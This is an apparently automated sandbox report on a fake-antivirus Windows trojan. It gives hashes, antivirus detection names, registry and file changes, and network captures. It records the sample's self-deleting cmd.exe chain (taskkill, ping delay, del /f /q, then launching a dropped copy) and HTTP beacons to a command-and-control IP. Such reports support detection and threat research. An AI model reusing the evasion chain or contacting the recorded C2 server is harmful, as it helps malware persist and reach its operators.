Analysis Date2015-06-12 11:53:36
MD52ea0fb464ec95e2891b53b5169ac6d18
SHA18cf6f9abbeb1781363f4d754bf723e8cac3a1c48

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 044f106645114e61cc4f40a0d03fabb5 sha1: d43ff85a37bc3047a10edde76ccd562812aa7cca size: 177664
Section.rdata md5: a70ff8d70135678c0284301ac13ceb15 sha1: f859623c33ce10d8d7500e106dc8b55776794bfb size: 1024
Section.data md5: 8ba515e9c32e0299198f4fc241cf3636 sha1: b1ba8e8d322dfef27e90fb72c5b0e95a4650963d size: 68608
Section.rsrc md5: 416020fa00102773c7d3315dd43f9520 sha1: 6480f52fc8afa259b3e1cf752e74af6a51418bca size: 3072
Timestamp2005-07-25 23:41:08
PEhashdeb6b7a4e1e6e9a1ba70784bf46a892b7aeeb08b
IMPhash588d231519d970eb442e9625fe8b8c0c
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVF-SecureGen:Heur.Cridex.2
AVDr. WebTrojan.Fakealert.19447
AVClamAVWin.Trojan.Fakeav-30342
AVArcabit (arcavir)Gen:Heur.Cridex.2
AVBullGuardGen:Heur.Cridex.2
AVPadvishno_virus
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997
AVCAT (quickheal)no_virus
AVTrend MicroTROJ_FAKEAV.SMID
AVKasperskyPacked.Win32.Krap.ic
AVZillya!Trojan.FakeAV.Win32.37859
AVEmsisoftGen:Heur.Cridex.2
AVIkarusPacker.Win32.Krap
AVFrisk (f-prot)W32/FakeAlert.JH.gen!Eldorado
AVAuthentiumW32/FakeAlert.JH.gen!Eldorado
AVMalwareBytesRogue.SecurityShield
AVMicroWorld (escan)Gen:Heur.Cridex.2
AVMicrosoft Security EssentialsRogue:Win32/Winwebsec
AVK7Trojan ( 001cdda01 )
AVBitDefenderGen:Heur.Cridex.2
AVFortinetW32/FakeAV.PACK!tr
AVSymantecTrojan.FakeAV!gen39
AVGrisoft (avg)Cryptic.BSC
AVEset (nod32)Win32/Kryptik.JDB
AVAlwil (avast)MalOb-EY [Cryp]
AVAd-AwareGen:Heur.Cridex.2
AVTwisterSuspicious.558BEC81EC3C0.mg
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVMcafeeFakeAlert-SecurityTool.w
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\1698158810.exe
Creates Process"C:\WINDOWS\system32\cmd.exe" /c taskkill /f /pid 1360 & ping -n 3 127.1 & del /f /q "C:\malware.exe" & start C:\Documents and Settings\Administrator\Local Settings\Application Data\169815~1.EXE -f
Creates Mutexi'm here

Process
↳ "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /pid 1360 & ping -n 3 127.1 & del /f /q "C:\malware.exe" & start C:\Documents and Settings\Administrator\Local Settings\Application Data\169815~1.EXE -f

Creates Processping -n 3 127.1
Creates Processtaskkill /f /pid 1360
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Application Data\169815~1.EXE -f

Process
↳ taskkill /f /pid 1360

Creates FilePIPE\lsarpc

Process
↳ ping -n 3 127.1

Winsock DNS127.1

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Application Data\169815~1.EXE -f

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutexi'm here
Winsock DNS178.238.227.4

Network Details:

HTTP GEThttp://178.238.227.4/cb_soft.php?q=f841b8aed3d7c980e2509022d35e77fe&uk=0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
HTTP GEThttp://178.238.227.4/cb_soft.php?q=f841b8aed3d7c980e2509022d35e77fe&yu=0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
HTTP GEThttp://178.238.227.4/cb_soft.php?q=f841b8aed3d7c980e2509022d35e77fe&xq=0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 178.238.227.4:80
Flows TCP192.168.1.1:1031 ➝ 178.238.227.4:80
Flows TCP192.168.1.1:1032 ➝ 178.238.227.4:80
Flows TCP192.168.1.1:1033 ➝ 178.238.227.4:80

Raw Pcap
0x00000000 (00000)   47455420 2f63625f 736f6674 2e706870   GET /cb_soft.php
0x00000010 (00016)   3f713d66 38343162 38616564 33643763   ?q=f841b8aed3d7c
0x00000020 (00032)   39383065 32353039 30323264 33356537   980e2509022d35e7
0x00000030 (00048)   37666526 756b3d30 20485454 502f312e   7fe&uk=0 HTTP/1.
0x00000040 (00064)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000050 (00080)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000060 (00096)   61746962 6c653b20 4d534945 20352e35   atible; MSIE 5.5
0x00000070 (00112)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000080 (00128)   290d0a48 6f73743a 20313738 2e323338   )..Host: 178.238
0x00000090 (00144)   2e323237 2e340d0a 43616368 652d436f   .227.4..Cache-Co
0x000000a0 (00160)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000b0 (00176)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f63625f 736f6674 2e706870   GET /cb_soft.php
0x00000010 (00016)   3f713d66 38343162 38616564 33643763   ?q=f841b8aed3d7c
0x00000020 (00032)   39383065 32353039 30323264 33356537   980e2509022d35e7
0x00000030 (00048)   37666526 79753d30 20485454 502f312e   7fe&yu=0 HTTP/1.
0x00000040 (00064)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000050 (00080)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000060 (00096)   61746962 6c653b20 4d534945 20352e35   atible; MSIE 5.5
0x00000070 (00112)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000080 (00128)   290d0a48 6f73743a 20313738 2e323338   )..Host: 178.238
0x00000090 (00144)   2e323237 2e340d0a 43616368 652d436f   .227.4..Cache-Co
0x000000a0 (00160)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000b0 (00176)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f63625f 736f6674 2e706870   GET /cb_soft.php
0x00000010 (00016)   3f713d66 38343162 38616564 33643763   ?q=f841b8aed3d7c
0x00000020 (00032)   39383065 32353039 30323264 33356537   980e2509022d35e7
0x00000030 (00048)   37666526 78713d30 20485454 502f312e   7fe&xq=0 HTTP/1.
0x00000040 (00064)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000050 (00080)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000060 (00096)   61746962 6c653b20 4d534945 20352e35   atible; MSIE 5.5
0x00000070 (00112)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000080 (00128)   290d0a48 6f73743a 20313738 2e323338   )..Host: 178.238
0x00000090 (00144)   2e323237 2e340d0a 43616368 652d436f   .227.4..Cache-Co
0x000000a0 (00160)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000b0 (00176)   0a0d0a                                ...


Strings